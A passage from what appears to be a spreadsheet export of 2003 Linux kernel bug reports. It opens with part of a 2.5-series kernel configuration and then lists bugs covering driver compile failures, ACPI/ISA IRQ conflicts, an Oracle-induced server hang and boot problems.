Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEFLOPPY=y CONFIG_BLK_DEV_IDESCSI=y # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_BLK_DEV_CMD640=y # CONFIG_BLK_DEV_CMD640_ENHANCED is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y # CONFIG_BLK_DEV_GENERIC is not set CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set CONFIG_BLK_DEV_ALI15X3=y # CONFIG_WDC_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set CONFIG_BLK_DEV_RZ1000=y # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_REPORT_LUNS is not set CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C7xx is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_NCR53C8XX is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_FILTER=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_XFRM_USER is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y # CONFIG_IP_NF_MATCH_UNCLEAN is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y # CONFIG_IP_NF_TARGET_MIRROR is not set CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y CONFIG_IP_NF_NAT_LOCAL=y # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y CONFIG_IP_NF_TARGET_TCPMSS=y # CONFIG_IP_NF_ARPTABLES is not set CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set # # IPv6: Netfilter Configuration # # CONFIG_IP6_NF_QUEUE is not set # CONFIG_IP6_NF_IPTABLES is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=y # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set CONFIG_SIS900=y # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y # CONFIG_PPP_ASYNC is not set # CONFIG_PPP_SYNC_TTY is not set # CONFIG_PPP_DEFLATE is not set # CONFIG_PPP_BSDCOMP is not set # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=y # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=y # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Hardware Sensors Mainboard support # # # I2C Hardware Sensors Chip support # # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_INTEL_RNG is not set # CONFIG_AMD_RNG is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP3 is not set CONFIG_AGP_INTEL=y CONFIG_AGP_VIA=y # CONFIG_AGP_AMD is not set # CONFIG_AGP_SIS is not set CONFIG_AGP_ALI=y # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # File systems # # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # CONFIG_REISERFS_FS is not set # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EXT3_FS is not set # CONFIG_JBD is not set CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_EFS_FS=y # CONFIG_CRAMFS is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # CONFIG_HUGETLBFS is not set CONFIG_ISO9660_FS=y CONFIG_JOLIET=y # CONFIG_ZISOFS is not set # CONFIG_JFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_VXFS_FS is not set # CONFIG_NTFS_FS is not set # CONFIG_HPFS_FS is not set CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set CONFIG_DEVPTS_FS=y # CONFIG_QNX4FS_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_SYSV_FS is not set CONFIG_UDF_FS=y CONFIG_UFS_FS=y # CONFIG_UFS_FS_WRITE is not set # CONFIG_XFS_FS is not set # # Network File Systems # # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set CONFIG_NFS_FS=y # CONFIG_NFS_V3 is not set # CONFIG_NFS_V4 is not set CONFIG_NFSD=y # CONFIG_NFSD_V3 is not set # CONFIG_NFSD_TCP is not set CONFIG_SUNRPC=y # CONFIG_SUNRPC_GSS is not set CONFIG_LOCKD=y CONFIG_EXPORTFS=y # CONFIG_CIFS is not set # CONFIG_SMB_FS is not set # CONFIG_NCP_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set CONFIG_NLS_ISO8859_5=y # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set CONFIG_NLS_ISO8859_15=y # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=y # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # # CONFIG_SND is not set # # Open Sound System # CONFIG_SOUND_PRIME=y # CONFIG_SOUND_BT878 is not set # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_EMU10K1 is not set # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set # CONFIG_SOUND_MAESTRO3 is not set # CONFIG_SOUND_ICH is not set # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set # CONFIG_SOUND_VIA82CXXX is not set CONFIG_SOUND_OSS=y # CONFIG_SOUND_TRACEINIT is not set # CONFIG_SOUND_DMAP is not set # CONFIG_SOUND_AD1816 is not set # CONFIG_SOUND_SGALAXY is not set # CONFIG_SOUND_ADLIB is not set # CONFIG_SOUND_ACI_MIXER is not set # CONFIG_SOUND_CS4232 is not set # CONFIG_SOUND_SSCAPE is not set # CONFIG_SOUND_GUS is not set # CONFIG_SOUND_VMIDI is not set # CONFIG_SOUND_TRIX is not set # CONFIG_SOUND_MSS is not set # CONFIG_SOUND_MPU401 is not set # CONFIG_SOUND_NM256 is not set # CONFIG_SOUND_MAD16 is not set # CONFIG_SOUND_PAS is not set # CONFIG_SOUND_PSS is not set # CONFIG_SOUND_SB is not set # CONFIG_SOUND_AWE32_SYNTH is not set # CONFIG_SOUND_WAVEFRONT is not set # CONFIG_SOUND_MAUI is not set # CONFIG_SOUND_YM3812 is not set # CONFIG_SOUND_OPL3SA1 is not set # CONFIG_SOUND_OPL3SA2 is not set CONFIG_SOUND_YMFPCI=y CONFIG_SOUND_YMFPCI_LEGACY=y # CONFIG_SOUND_UART6850 is not set # CONFIG_SOUND_AEDSP16 is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set CONFIG_USB_PRINTER=y CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y # CONFIG_USB_HIDINPUT is not set # CONFIG_USB_HIDDEV is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set CONFIG_USB_SCANNER=y # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_CDCETHER is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set # CONFIG_KALLSYMS is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y # CONFIG_CRYPTO_HMAC is not set # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=y # CONFIG_CRYPTO_SHA1 is not set # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set # CONFIG_CRYPTO_DES is not set CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y # CONFIG_CRYPTO_SERPENT is not set CONFIG_CRYPTO_AES=y # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_X86_BIOS_REBOOT=y</t>
  </si>
  <si>
    <t>Adaptec 1542 driver does not compile</t>
  </si>
  <si>
    <t>2003-03-02 13:40 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:56 UTC</t>
  </si>
  <si>
    <t>In file included from drivers/scsi/aha1542.c:43: include/linux/mca-legacy.h:10: warning: #warning "MCA legacy - please move your driver to the new sysfs api" drivers/scsi/aha1542.c: In function `aha1542_detect': drivers/scsi/aha1542.c:1164: too many arguments to function `pnp_activate_dev' make[2]: *** [drivers/scsi/aha1542.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>ACPI + PCI breaks ISA SoundBlaster</t>
  </si>
  <si>
    <t>2.5.xx-2.6.xx</t>
  </si>
  <si>
    <t>2003-03-02 20:13 UTC</t>
  </si>
  <si>
    <t>2004-03-03 14:59 UTC</t>
  </si>
  <si>
    <t>Distribution: LFS Hardware Environment: IBM 300PL 6892-N2U PIII (Katmai) 450Mhz Problem Description: ACPI/PCI dont notice ISA irqs used Steps to reproduce: If I set pci=noacpi I have no IRQ conflicts. However, disabling pci=noacpi I get conflicts even though all IRQs are correct and are properly allocated. the /proc/interrupts for when pci=noacpi is set and disabled are identical however conflicts are reported by the ISAPnP OSS Soundblaster driver. PCI routing with ACPI isn't aware of ISA interrupts in use or ISA interrupts required.</t>
  </si>
  <si>
    <t>Oracle9i (Relase 9.2) causes the host server to a hard-hang when DOTS is run against Oracle.</t>
  </si>
  <si>
    <t>2003-03-03 12:26 UTC</t>
  </si>
  <si>
    <t>Ananda Venkataraman</t>
  </si>
  <si>
    <t>2003-03-31 08:31 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat Linux Advanced Server Release 2(2.4.9-e.3enterprise) Hardware Environment: IBM x370/Intel P700/8-way/9.2GB RAM Software Environment:Linux Kernel-2.5.63/Java2 j2sdk1.4.1_01 from SUN; Dots-1.1.1; Oracle9i Relase-9.2 for Linux. shmmax was set to 4GB. Support for HighMem is turned on. Problem Description: DOTS against Oracle (Release 9.2) on Ozzy (8way) casuses the server to enter into a hard-hang, usually within 30 minutes. 3 DOTS clients were used and each client was having 4 sessions. Each session was having 10 connections. The server slowly became non-responsive after running for a few minutes and entered into a hard-hang ultimately. The server has to be hard- rebooted. No error messages found in the dmesg or messages file in the /var/log dir. No messages were logged on the oracle server side too. Steps to reproduce: Insatll RedHat Linux Advanced Server on the server. Install kernel-2.5.63 and make 2.5.63 as the default kernel. Reboot Install Java2-SDK from sun. Install and configure Oracle9i. Install DOTS perfromance monitor and also other java drivers if necessary. Start the DOTS performance monitor on the server side to enable the connections from the DOTS client. On the client side install Java 1.3.1 or above.Install DOTS and configure the ini file. Install the java clients for Oracle connections. Repeat the same for two more clients. Start four sessions in each client (10 connections for each session) and launch different test cases.</t>
  </si>
  <si>
    <t>i82365.c does not compile (too many arguments to `pnp_activate_dev')</t>
  </si>
  <si>
    <t>2003-03-04 09:33 UTC</t>
  </si>
  <si>
    <t>Vincent Deffontaines</t>
  </si>
  <si>
    <t>2003-03-05 04:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: HP pavilion n5422 laptop Software Environment: gcc3.2 Problem Description: i82365.c does not compile and issues errors [and warnings] gcc -Wp,-MD,drivers/pcmcia/.i82365.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=i82365 -DKBUILD_MODNAME=i82365 -c -o drivers/pcmcia/i82365.o drivers/pcmcia/i82365.c drivers/pcmcia/i82365.c: In function `is_alive': drivers/pcmcia/i82365.c:720: warning: `__check_region' is deprecated (declared at include/linux/ioport.h:112) drivers/pcmcia/i82365.c: In function `isa_probe': drivers/pcmcia/i82365.c:849: too many arguments to function `pnp_activate_dev' drivers/pcmcia/i82365.c:867: warning: `__check_region' is deprecated (declared at include/linux/ioport.h:112) make[3]: *** [drivers/pcmcia/i82365.o] Error 1 make[2]: *** [drivers/pcmcia] Error 2 make[1]: *** [drivers] Error 2 make[1]: Leaving directory `/usr/src/linux-2.5.63' make: *** [stamp-build] Error 2 Steps to reproduce: I got this error (of course) when compiling this driver as module as well as compiled in kernel.</t>
  </si>
  <si>
    <t>compile failure in drivers/net/tokenring/tms380tr.c</t>
  </si>
  <si>
    <t>2.5.63-bk6</t>
  </si>
  <si>
    <t>2003-03-04 13:16 UTC</t>
  </si>
  <si>
    <t>2003-04-19 10:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc3 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/net/tokenring/.tms380tr.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=tms380tr -DKBUILD_MODNAME=tms380tr -c -o drivers/net/tokenring/.tmp_tms380tr.o drivers/net/tokenring/tms380tr.c drivers/net/tokenring/tms380tr.c: In function `tms380tr_open': drivers/net/tokenring/tms380tr.c:260: invalid type argument of `unary *' drivers/net/tokenring/tms380tr.c: In function `tms380tr_init_adapter': drivers/net/tokenring/tms380tr.c:1461: warning: long unsigned int format, different type arg (arg 3) drivers/net/tokenring/tms380tr.c:1461: warning: long unsigned int format, different type arg (arg 3) make[3]: *** [drivers/net/tokenring/tms380tr.o] Error 1 make[2]: *** [drivers/net/tokenring] Error 2 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Networking support ---&gt; Token Ring devices (depends on LLC=y) ---&gt; &lt;*&gt; Generic TMS380 Token Ring ISA/PCI adapter support CONFIG_TMS380TR=y</t>
  </si>
  <si>
    <t>aic7xxx_old does not boot</t>
  </si>
  <si>
    <t>2003-03-04 15:36 UTC</t>
  </si>
  <si>
    <t>Mark Wong</t>
  </si>
  <si>
    <t>Distribution: debian 3.0r1 Hardware Environment: Netfinity 6000R Software Environment: gcc-3.2.3, libc-2.3.1 Problem Description: aic7xxx_old booted for under 2.4.62, but appears to halt when probing for devices in 2.5.63. I don't see any clues to problems on the console. Andrew Morton suspects something in scsi core. Steps to reproduce:</t>
  </si>
  <si>
    <t>Failed to register 'sysfs' in sysfs</t>
  </si>
  <si>
    <t>2003-03-05 07:48 UTC</t>
  </si>
  <si>
    <t>2003-03-06 09:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Problem Description: On boot, I noticed this failure message... Mount-cache hash table entries: 512 (order: 0, 4096 bytes) Failed to register 'sysfs' in sysfs -&gt; /dev -&gt; /dev/console -&gt; /root CPU: L1 I cache: 16K, L1 D cache: 16K Steps to reproduce:</t>
  </si>
  <si>
    <t>Badness in Riva framebuffer</t>
  </si>
  <si>
    <t>2003-03-05 12:19 UTC</t>
